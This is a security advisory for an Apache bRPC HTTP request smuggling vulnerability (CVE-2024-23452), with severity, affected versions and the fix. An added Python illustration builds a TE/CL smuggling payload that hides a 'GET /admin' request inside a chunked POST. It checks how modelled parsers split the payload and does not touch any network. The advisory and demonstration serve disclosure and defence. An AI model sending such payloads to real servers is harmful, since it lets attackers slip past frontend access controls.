Request Smuggling Vulnerability in Apache bRPC 0.9.5~1.7.0
CVE-2024-23452

7.5HIGH

Key Information:

Vendor
Apache
CVE Published:
8 February 2024

Summary

A request smuggling vulnerability exists in the HTTP server component of Apache bRPC versions 0.9.5 through 1.7.0 on all platforms. The root cause is that bRPC's http_parser does not comply with RFC 7230 (HTTP/1.1) when a request carries both a Transfer-Encoding and a Content-Length header field. RFC 7230 section 3.3.3 requires Transfer-Encoding to override Content-Length in that case and notes that such a message may indicate an attempt at request smuggling or response splitting, so it ought to be treated as an error.

Attack scenario: a bRPC-based HTTP server runs behind a frontend (proxy) that forwards requests to it over a persistent connection and frames those requests by Transfer-Encoding whenever the field contains "chunked". Because the bRPC server frames the same bytes by Content-Length instead of chunk-decoding or rejecting them, the two sides disagree on where one request ends and the next begins, and an attacker can smuggle an additional request into the backend connection. No misconfiguration of the bRPC server is required; the CVSS metrics reflect this (network attack, no privileges or user interaction, integrity impact only).

Mitigation: upgrade to Apache bRPC 1.8.0 or later, where the parser has been fixed.
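The following Python script is an added illustration of the scenario above; it is not bRPC code and does not reproduce bRPC's parser. It frames one constructed persistent-connection byte stream under three hand-written framing policies (assumptions, simplified): "te" models a frontend that frames by Transfer-Encoding, "cl" models a backend that frames by Content-Length (the pre-1.8.0 behaviour the advisory describes), and "strict" models a server that rejects a message carrying both headers, as RFC 7230 section 3.3.3 permits. The attacker payload is built inline.

```python
"""
Added illustration of TE/CL framing disagreement (not Apache bRPC code).
The parsers are simplified, hand-written models (assumption); the request
stream is constructed here for the demonstration.
"""
from __future__ import annotations

from dataclasses import dataclass


@dataclass
class Request:
    request_line: str
    headers: dict[str, str]   # header names lower-cased
    body: bytes


def _parse_head(buf: bytes):
    """Split request line and headers off the buffer; None if the head is incomplete."""
    end = buf.find(b"\r\n\r\n")
    if end < 0:
        return None
    lines = buf[:end].decode("ascii").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, buf[end + 4:]


def _read_chunked(rest: bytes):
    """Decode a chunked body (no trailer support). Returns (body, remaining) or None."""
    body = b""
    while True:
        nl = rest.find(b"\r\n")
        if nl < 0:
            return None
        size = int(rest[:nl].split(b";")[0].strip(), 16)   # drop chunk extensions
        rest = rest[nl + 2:]
        if size == 0:
            if not rest.startswith(b"\r\n"):
                return None
            return body, rest[2:]
        if len(rest) < size + 2 or rest[size:size + 2] != b"\r\n":
            return None
        body += rest[:size]
        rest = rest[size + 2:]


def split_requests(stream: bytes, policy: str) -> list[Request]:
    """Frame successive requests out of one connection's bytes under a framing policy."""
    out: list[Request] = []
    buf = stream
    while buf:
        parsed = _parse_head(buf)
        if parsed is None:
            break
        line, hdrs, rest = parsed
        has_te = "chunked" in hdrs.get("transfer-encoding", "").lower()
        has_cl = "content-length" in hdrs
        if policy == "strict" and has_te and has_cl:
            # RFC 7230 s3.3.3: such a message "ought to be handled as an error"
            raise ValueError("both Transfer-Encoding and Content-Length present")
        if has_te and (policy != "cl" or not has_cl):
            decoded = _read_chunked(rest)          # TE wins ("te"/"strict", or no CL)
            if decoded is None:
                break
            body, buf = decoded
        else:
            length = int(hdrs.get("content-length", "0"))   # CL wins ("cl" policy)
            if len(rest) < length:
                break
            body, buf = rest[:length], rest[length:]
        out.append(Request(line, hdrs, body))
    return out


def build_stream() -> bytes:
    """Constructed attacker payload: one chunked POST whose chunk data is a second request."""
    smuggled = (b"GET /admin HTTP/1.1\r\n"
                b"Host: backend\r\n"
                b"Content-Length: 7\r\n"   # swallows the "\r\n0\r\n\r\n" that follows the chunk
                b"\r\n")
    size_line = b"%x\r\n" % len(smuggled)
    # The outer Content-Length covers exactly the chunk-size line, so a
    # Content-Length-framed backend starts its next request at "GET /admin".
    outer_head = (b"POST /api HTTP/1.1\r\n"
                  b"Host: backend\r\n"
                  + b"Content-Length: %d\r\n" % len(size_line)
                  + b"Transfer-Encoding: chunked\r\n\r\n")
    return outer_head + size_line + smuggled + b"\r\n" + b"0\r\n\r\n"


def request_lines(stream: bytes, policy: str) -> list[str]:
    return [r.request_line for r in split_requests(stream, policy)]


def rejected_by_strict(stream: bytes) -> bool:
    try:
        split_requests(stream, "strict")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    s = build_stream()
    print("frontend (TE):", request_lines(s, "te"))   # one request
    print("backend  (CL):", request_lines(s, "cl"))   # two requests, the second smuggled
    print("strict rejects:", rejected_by_strict(s))
```

The frontend sees a single POST whose chunked body happens to contain the text of a GET; the Content-Length-framed backend sees that POST with a 4-byte body followed by a separate GET /admin, which is the smuggled request. The "strict" policy shows the server-side check a compliant implementation can apply; note that RFC 7230 also requires a compliant proxy to strip Content-Length before forwarding such a message, which would defeat this payload on its own, but the advisory concerns only the backend parser, fixed in bRPC 1.8.0.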

Affected Version(s)

Apache bRPC >= 0.9.5, < 1.8.0 (0.9.5 through 1.7.0; fixed in 1.8.0)

CVSS V3.1 (vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)

Score:
7.5
Severity:
HIGH
Confidentiality:
None
Integrity:
High
Availability:
None
Attack Vector:
Network
Attack Complexity:
Low
Privileges Required:
None
User Interaction:
None
Scope:
Unchanged

Credit

Pingtao Wei of 2012 Laboratories
Ziyang Chen of 2012 Laboratories
Haoran Zhi of 2012 Laboratories
Hongpei Li of 2012 Laboratories